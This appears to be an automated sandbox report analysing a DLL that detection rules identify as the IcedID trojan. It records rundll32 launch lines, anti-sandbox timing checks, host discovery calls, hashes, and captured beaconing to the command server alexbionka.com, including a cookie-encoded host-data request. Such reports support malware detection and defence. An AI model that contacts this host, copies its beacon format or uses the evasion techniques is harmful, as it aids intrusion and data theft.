    Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\y2D56.tmp.dll",JfUksQmDGYQRSQfC
    Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\y2D56.tmp.dll",MVeMOgOlu
    Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\y2D56.tmp.dll",OnqcowdLVOpj
    Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\y2D56.tmp.dll",aXXRQNg
    Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\y2D56.tmp.dll",agetCYHzlW
    Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\y2D56.tmp.dll",#1
    Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\y2D56.tmp.dll,JfUksQmDGYQRSQfC
    Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\y2D56.tmp.dll,MVeMOgOlu
    Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\y2D56.tmp.dll,OnqcowdLVOpj
    Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\y2D56.tmp.dll",JfUksQmDGYQRSQfC
    Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\y2D56.tmp.dll",MVeMOgOlu
    Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\y2D56.tmp.dll",OnqcowdLVOpj
    Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\y2D56.tmp.dll",aXXRQNg
    Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\y2D56.tmp.dll",agetCYHzlW
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\y2D56.tmp.dll",#1
    Source: classification engineClassification label: mal100.troj.evad.winDLL@21/0@1/1
    Source: C:\Windows\System32\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: y2D56.tmp.dllStatic PE information: Image base 0x180000000 > 0x60000000
    Source: y2D56.tmp.dllStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
    Source: y2D56.tmp.dllStatic PE information: real checksum: 0x59d91 should be: 0x654aa
    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00007FFA65C58BC2 push rax; ret
    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00007FFA65C5610E push rdx; ret
    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018000108C LoadLibraryA,GetProcAddress,NtQuerySystemInformation,GetProcessHeap,HeapReAlloc,RtlAllocateHeap,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX

    Malware Analysis System Evasion

    barindex
    Source: C:\Windows\System32\rundll32.exeRDTSC instruction interceptor: First address: 0000000180002AE1 second address: 0000000180002B06 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec esp 0x0000000a mov eax, eax 0x0000000c xor ecx, ecx 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 mov dword ptr [esp+20h], eax 0x00000019 mov dword ptr [esp+24h], ebx 0x0000001d mov dword ptr [esp+28h], ecx 0x00000021 mov dword ptr [esp+2Ch], edx 0x00000025 rdtsc
    Source: C:\Windows\System32\rundll32.exeRDTSC instruction interceptor: First address: 0000000180002B1B second address: 0000000180002B28 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 nop 0x00000007 dec eax 0x00000008 or eax, edx 0x0000000a dec eax 0x0000000b mov ecx, eax 0x0000000d rdtsc
    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180002AC0 SwitchToThread,SwitchToThread,
    Source: C:\Windows\System32\loaddll64.exe TID: 4980Thread sleep time: -120000s >= -30000s
    Source: C:\Windows\System32\rundll32.exeCode function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,
    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180002174 rdtsc
    Source: C:\Windows\System32\loaddll64.exeThread delayed: delay time: 120000
    Source: rundll32.exe, 00000003.00000002.432179875.0000021282104000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: rundll32.exe, 00000003.00000002.432179875.0000021282104000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW'
    Source: rundll32.exe, 00000003.00000002.432152014.00000212820D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`
    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018000108C LoadLibraryA,GetProcAddress,NtQuerySystemInformation,GetProcessHeap,HeapReAlloc,RtlAllocateHeap,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,
    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180001C28 GetComputerNameExW,LookupAccountNameW,GetLastError,GetProcessHeap,HeapAlloc,LookupAccountNameW,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,
    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180002174 rdtsc

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Source: C:\Windows\System32\rundll32.exeNetwork Connect: 64.227.108.27 80
    Source: C:\Windows\System32\rundll32.exeDomain query: alexbionka.com
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\y2D56.tmp.dll",#1
    Source: C:\Windows\System32\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180002018 GetComputerNameExW,GetUserNameW,wsprintfW,wsprintfW,wsprintfW,

    Stealing of Sensitive Information

    barindex
    Source: Yara matchFile source: 3.2.rundll32.exe.212802e97b8.1.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 00000003.00000002.432152014.00000212820D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000003.00000002.431790390.00000212802D9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 2700, type: MEMORYSTR
    Source: Yara matchFile source: 3.2.rundll32.exe.180000000.0.unpack, type: UNPACKEDPE

    Remote Access Functionality

    barindex
    Source: Yara matchFile source: 3.2.rundll32.exe.212802e97b8.1.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 00000003.00000002.432152014.00000212820D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000003.00000002.431790390.00000212802D9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 2700, type: MEMORYSTR
    Source: Yara matchFile source: 3.2.rundll32.exe.180000000.0.unpack, type: UNPACKEDPE
    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid Accounts1
    Native API
    Path Interception111
    Process Injection
    11
    Virtualization/Sandbox Evasion
    OS Credential Dumping221
    Security Software Discovery
    Remote Services1
    Archive Collected Data
    Exfiltration Over Other Network Medium1
    Encrypted Channel
    Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts111
    Process Injection
    LSASS Memory11
    Virtualization/Sandbox Evasion
    Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth3
    Ingress Tool Transfer
    Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
    Obfuscated Files or Information
    Security Account Manager1
    Account Discovery
    SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration3
    Non-Application Layer Protocol
    Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
    Rundll32
    NTDS1
    System Owner/User Discovery
    Distributed Component Object ModelInput CaptureScheduled Transfer13
    Application Layer Protocol
    SIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
    Remote System Discovery
    SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain Credentials1
    System Network Configuration Discovery
    VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
    External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync22
    System Information Discovery
    Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    y2D56.tmp.dll14%VirustotalBrowse
    y2D56.tmp.dll100%AviraHEUR/AGEN.1251556
    No Antivirus matches
    SourceDetectionScannerLabelLinkDownload
    3.2.rundll32.exe.7ffa65c50000.2.unpack100%AviraHEUR/AGEN.1251556Download File
    3.2.rundll32.exe.180000000.0.unpack100%AviraHEUR/AGEN.1205098Download File
    SourceDetectionScannerLabelLink
    alexbionka.com9%VirustotalBrowse
    SourceDetectionScannerLabelLink
    alexbionka.com100%Avira URL Cloudmalware
    http://alexbionka.com/QpkO100%Avira URL Cloudmalware
    http://alexbionka.com/100%Avira URL Cloudmalware
    http://alexbionka.com/UN100%Avira URL Cloudmalware
    http://alexbionka.com:80/h100%Avira URL Cloudmalware
    NameIPActiveMaliciousAntivirus DetectionReputation
    alexbionka.com
    64.227.108.27
    truetrueunknown
    NameMaliciousAntivirus DetectionReputation
    alexbionka.comtrue
    • Avira URL Cloud: malware
    unknown
    http://alexbionka.com/true
    • Avira URL Cloud: malware
    unknown
    NameSourceMaliciousAntivirus DetectionReputation
    http://alexbionka.com/QpkOrundll32.exe, 00000003.00000002.432152014.00000212820D0000.00000004.00000020.00020000.00000000.sdmptrue
    • Avira URL Cloud: malware
    unknown
    http://alexbionka.com/UNrundll32.exe, 00000003.00000002.431790390.00000212802D9000.00000004.00000020.00020000.00000000.sdmptrue
    • Avira URL Cloud: malware
    unknown
    http://alexbionka.com:80/hrundll32.exe, 00000003.00000002.432152014.00000212820D0000.00000004.00000020.00020000.00000000.sdmptrue
    • Avira URL Cloud: malware
    unknown
    • No. of IPs < 25%
    • 25% < No. of IPs < 50%
    • 50% < No. of IPs < 75%
    • 75% < No. of IPs
    IPDomainCountryFlagASNASN NameMalicious
    64.227.108.27
    alexbionka.comUnited States
    14061DIGITALOCEAN-ASNUStrue
    Joe Sandbox Version:35.0.0 Citrine
    Analysis ID:682775
    Start date and time:2022-08-12 00:27:08 +02:00
    Joe Sandbox Product:CloudBasic
    Overall analysis duration:0h 3m 42s
    Hypervisor based Inspection enabled:false
    Report type:light
    Sample file name:y2D56.tmp.dll
    Cookbook file name:default.jbs
    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
    Number of analysed new started processes analysed:13
    Number of new started drivers analysed:0
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:0
    Technologies:
    • HCA enabled
    • EGA enabled
    • HDC enabled
    • AMSI enabled
    Analysis Mode:default
    Analysis stop reason:Timeout
    Detection:MAL
    Classification:mal100.troj.evad.winDLL@21/0@1/1
    EGA Information:
    • Successful, ratio: 100%
    HDC Information:
    • Successful, ratio: 77.7% (good quality ratio 58.6%)
    • Quality average: 55.7%
    • Quality standard deviation: 38.8%
    HCA Information:
    • Successful, ratio: 96%
    • Number of executed functions: 0
    • Number of non-executed functions: 0
    Cookbook Comments:
    • Found application associated with file extension: .dll
    • Adjust boot time
    • Enable AMSI
    • Stop behavior analysis, all processes terminated
    • Exclude process from analysis (whitelisted): MpCmdRun.exe, conhost.exe
    • Not all processes where analyzed, report is missing behavior information
    • Report size getting too big, too many NtProtectVirtualMemory calls found.
    TimeTypeDescription
    00:28:21API Interceptor1x Sleep call for process: rundll32.exe modified
    00:28:21API Interceptor1x Sleep call for process: loaddll64.exe modified
    No context
    No context
    No context
    No context
    No context
    No created / dropped files found
    File type:PE32+ executable (DLL) (console) x86-64, for MS Windows
    Entropy (8bit):4.6693263018201145
    TrID:
    • Win64 Dynamic Link Library (generic) (102004/3) 86.43%
    • Win64 Executable (generic) (12005/4) 10.17%
    • Generic Win/DOS Executable (2004/3) 1.70%
    • DOS Executable Generic (2002/1) 1.70%
    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.01%
    File name:y2D56.tmp.dll
    File size:360448
    MD5:363777daf36e9534762d30bd4bf22c74
    SHA1:ea94d9afd355dd23a069f21b3562d85a4266da4f
    SHA256:8cd135e5b49d16aceb7665b6316cd4df2e132ef503ff0af51c080bad7010efd6
    SHA512:c8cac2963c8454890483823738e5adcaee4e945839b64d241d545d3dbc9a798fba7d923eb764cb455db2d27992915cd5f6ef9fae0b05175b7f8ae9669db93d53
    SSDEEP:6144:RYCYa6MfAcSlE+S0fzAMJfWpKd5WhAl7CJDZ/PeHbUhHTmGPqG7s6FmlEHKiTd:SCwMfjSlE+A4eguRJDtPZIG46FkEH9
    TLSH:6674AFB8F704A9E7D52E527BCA96BCD903722E629FCAD9CD416477C305A3725FE02804
    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......U.4...Z...Z...Z...Y...Z.Y.Z...Z.3.....Z.j.X...Z.Rich..Z.........................PE..d...Y..b.........." .....x.................
    Icon Hash:74f0e4ecccdce0e4
    Entrypoint:0x180000000
    Entrypoint Section:
    Digitally signed:false
    Imagebase:0x180000000
    Subsystem:windows cui
    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, DLL
    DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
    Time Stamp:0x62F4D159 [Thu Aug 11 09:52:25 2022 UTC]
    TLS Callbacks:
    CLR (.Net) Version:
    OS Version Major:6
    OS Version Minor:0
    File Version Major:6
    File Version Minor:0
    Subsystem Version Major:6
    Subsystem Version Minor:0
    Import Hash:
    Instruction
    dec ebp
    pop edx
    nop
    add byte ptr [ebx], al
    add byte ptr [eax], al
    add byte ptr [eax+eax], al
    add byte ptr [eax], al
    NameVirtual AddressVirtual Size Is in Section
    IMAGE_DIRECTORY_ENTRY_EXPORT0x590000x17d.rdata
    IMAGE_DIRECTORY_ENTRY_IMPORT0x00x0
    IMAGE_DIRECTORY_ENTRY_RESOURCE0x5a0000x1e0.rsrc
    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
    IMAGE_DIRECTORY_ENTRY_IAT0x00x0
    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
    .text0x10000x577140x57800False0.5704436383928572DOS executable (COM)4.650785896133885IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    .rdata0x590000x17d0x200False0.63671875data4.436426000455931IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
    .rsrc0x5a0000x1e00x200False0.53125data4.724728911998389IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
    NameRVASizeTypeLanguageCountry
    RT_MANIFEST0x5a0600x17dXML 1.0 document textEnglishUnited States
    NameOrdinalAddress
    JfUksQmDGYQRSQfC20x180009422
    MVeMOgOlu30x1800098fa
    OnqcowdLVOpj40x18000986e
    aXXRQNg50x180009bee
    agetCYHzlW60x180009487
    bbMIBZKkpJrSw70x18000976d
    nvWxVSzNIh80x180009532
    onXyNAQeqW90x180009b56
    qBYCIPM100x180009d39
    raiafa110x180009a6f
    ryiLrNIWKPUxQAhG120x1800096ea
    tndPRjog130x18000944d
    vGGAkgKOkEwmNdGA140x1800095f0
    zBiUZzLtC150x1800099c1
    ztyasufasklfmjnaks10x18000105e
    Language of compilation systemCountry where language is spokenMap
    EnglishUnited States
    TimestampSource PortDest PortSource IPDest IP
    Aug 12, 2022 00:28:21.351857901 CEST4971680192.168.2.564.227.108.27
    Aug 12, 2022 00:28:21.527837992 CEST804971664.227.108.27192.168.2.5
    Aug 12, 2022 00:28:21.527980089 CEST4971680192.168.2.564.227.108.27
    Aug 12, 2022 00:28:21.528403997 CEST4971680192.168.2.564.227.108.27
    Aug 12, 2022 00:28:21.702569008 CEST804971664.227.108.27192.168.2.5
    Aug 12, 2022 00:28:22.168242931 CEST804971664.227.108.27192.168.2.5
    Aug 12, 2022 00:28:22.288031101 CEST4971680192.168.2.564.227.108.27
    Aug 12, 2022 00:28:23.504345894 CEST4971680192.168.2.564.227.108.27
    TimestampSource PortDest PortSource IPDest IP
    Aug 12, 2022 00:28:21.294488907 CEST5974653192.168.2.58.8.8.8
    Aug 12, 2022 00:28:21.317162991 CEST53597468.8.8.8192.168.2.5
    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
    Aug 12, 2022 00:28:21.294488907 CEST192.168.2.58.8.8.80x8425Standard query (0)alexbionka.comA (IP address)IN (0x0001)
    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
    Aug 12, 2022 00:28:21.317162991 CEST8.8.8.8192.168.2.50x8425No error (0)alexbionka.com64.227.108.27A (IP address)IN (0x0001)
    • alexbionka.com
    Session IDSource IPSource PortDestination IPDestination PortProcess
    0192.168.2.54971664.227.108.2780C:\Windows\System32\rundll32.exe
    TimestampkBytes transferredDirectionData
    Aug 12, 2022 00:28:21.528403997 CEST92OUTGET / HTTP/1.1
    Connection: Keep-Alive
    Cookie: __gads=3570055661:1:4060:115; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333734363533:616C666F6E73:30394232333031304432353637323145; __io=0; _gid=67AFEDD28876
    Host: alexbionka.com
    Aug 12, 2022 00:28:22.168242931 CEST93INHTTP/1.1 404 Not Found
    Server: nginx
    Date: Thu, 11 Aug 2022 22:28:22 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Data Raw: 31 30 63 0d 0a 09 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 09 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 09 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 09 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 09 3c 68 72 3e 0a 09 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 6c 65 78 62 69 6f 6e 6b 61 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 09 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 10c<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at alexbionka.com Port 80</address></body></html>0


    Click to jump to process

    Target ID:0
    Start time:00:28:07
    Start date:12/08/2022
    Path:C:\Windows\System32\loaddll64.exe
    Wow64 process (32bit):false
    Commandline:loaddll64.exe "C:\Users\user\Desktop\y2D56.tmp.dll"
    Imagebase:0x7ff6a02b0000
    File size:140288 bytes
    MD5 hash:4E8A40CAD6CCC047914E3A7830A2D8AA
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high

    Target ID:1
    Start time:00:28:08
    Start date:12/08/2022
    Path:C:\Windows\System32\cmd.exe
    Wow64 process (32bit):false
    Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\y2D56.tmp.dll",#1
    Imagebase:0x7ff602050000
    File size:273920 bytes
    MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high

    Target ID:2
    Start time:00:28:08
    Start date:12/08/2022
    Path:C:\Windows\System32\rundll32.exe
    Wow64 process (32bit):false
    Commandline:rundll32.exe C:\Users\user\Desktop\y2D56.tmp.dll,JfUksQmDGYQRSQfC
    Imagebase:0x7ff79fb80000
    File size:69632 bytes
    MD5 hash:73C519F050C20580F8A62C849D49215A
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high

    Target ID:3
    Start time:00:28:08
    Start date:12/08/2022
    Path:C:\Windows\System32\rundll32.exe
    Wow64 process (32bit):false
    Commandline:rundll32.exe "C:\Users\user\Desktop\y2D56.tmp.dll",#1
    Imagebase:0x7ff79fb80000
    File size:69632 bytes
    MD5 hash:73C519F050C20580F8A62C849D49215A
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Yara matches:
    • Rule: JoeSecurity_IcedID_1, Description: Yara detected IcedID, Source: 00000003.00000002.432152014.00000212820D0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
    • Rule: Windows_Trojan_IcedID_11d24d35, Description: unknown, Source: 00000003.00000002.431671660.0000000180004000.00000002.00001000.00020000.00000000.sdmp, Author: unknown
    • Rule: Windows_Trojan_IcedID_0b62e783, Description: unknown, Source: 00000003.00000002.431665923.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
    • Rule: Windows_Trojan_IcedID_91562d18, Description: unknown, Source: 00000003.00000002.431665923.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
    • Rule: Windows_Trojan_IcedID_48029e37, Description: unknown, Source: 00000003.00000002.431665923.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
    • Rule: JoeSecurity_IcedID_6, Description: Yara detected IcedID, Source: 00000003.00000002.431790390.00000212802D9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
    • Rule: JoeSecurity_IcedID_1, Description: Yara detected IcedID, Source: 00000003.00000002.431790390.00000212802D9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
    • Rule: Windows_Trojan_IcedID_11d24d35, Description: unknown, Source: 00000003.00000002.431790390.00000212802D9000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
    • Rule: Windows_Trojan_IcedID_0b62e783, Description: unknown, Source: 00000003.00000002.431790390.00000212802D9000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
    • Rule: Windows_Trojan_IcedID_91562d18, Description: unknown, Source: 00000003.00000002.431790390.00000212802D9000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
    • Rule: Windows_Trojan_IcedID_48029e37, Description: unknown, Source: 00000003.00000002.431790390.00000212802D9000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
    Reputation:high

    Target ID:4
    Start time:00:28:12
    Start date:12/08/2022
    Path:C:\Windows\System32\rundll32.exe
    Wow64 process (32bit):false
    Commandline:rundll32.exe C:\Users\user\Desktop\y2D56.tmp.dll,MVeMOgOlu
    Imagebase:0x7ff79fb80000
    File size:69632 bytes
    MD5 hash:73C519F050C20580F8A62C849D49215A
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high

    Target ID:5
    Start time:00:28:15
    Start date:12/08/2022
    Path:C:\Windows\System32\rundll32.exe
    Wow64 process (32bit):false
    Commandline:rundll32.exe C:\Users\user\Desktop\y2D56.tmp.dll,OnqcowdLVOpj
    Imagebase:0x7ff79fb80000
    File size:69632 bytes
    MD5 hash:73C519F050C20580F8A62C849D49215A
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high

    Target ID:6
    Start time:00:28:18
    Start date:12/08/2022
    Path:C:\Windows\System32\rundll32.exe
    Wow64 process (32bit):false
    Commandline:rundll32.exe "C:\Users\user\Desktop\y2D56.tmp.dll",JfUksQmDGYQRSQfC
    Imagebase:0x7ff79fb80000
    File size:69632 bytes
    MD5 hash:73C519F050C20580F8A62C849D49215A
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high

    Target ID:7
    Start time:00:28:19
    Start date:12/08/2022
    Path:C:\Windows\System32\rundll32.exe
    Wow64 process (32bit):false
    Commandline:rundll32.exe "C:\Users\user\Desktop\y2D56.tmp.dll",MVeMOgOlu
    Imagebase:0x7ff79fb80000
    File size:69632 bytes
    MD5 hash:73C519F050C20580F8A62C849D49215A
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high

    Target ID:9
    Start time:00:28:19
    Start date:12/08/2022
    Path:C:\Windows\System32\rundll32.exe
    Wow64 process (32bit):false
    Commandline:rundll32.exe "C:\Users\user\Desktop\y2D56.tmp.dll",OnqcowdLVOpj
    Imagebase:0x7ff79fb80000
    File size:69632 bytes
    MD5 hash:73C519F050C20580F8A62C849D49215A
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high

    Target ID:11
    Start time:00:28:20
    Start date:12/08/2022
    Path:C:\Windows\System32\rundll32.exe
    Wow64 process (32bit):false
    Commandline:rundll32.exe "C:\Users\user\Desktop\y2D56.tmp.dll",aXXRQNg
    Imagebase:0x7ff79fb80000
    File size:69632 bytes
    MD5 hash:73C519F050C20580F8A62C849D49215A
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high

    Target ID:12
    Start time:00:28:21
    Start date:12/08/2022
    Path:C:\Windows\System32\rundll32.exe
    Wow64 process (32bit):false
    Commandline:rundll32.exe "C:\Users\user\Desktop\y2D56.tmp.dll",agetCYHzlW
    Imagebase:0x7ff79fb80000
    File size:69632 bytes
    MD5 hash:73C519F050C20580F8A62C849D49215A
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high

    No disassembly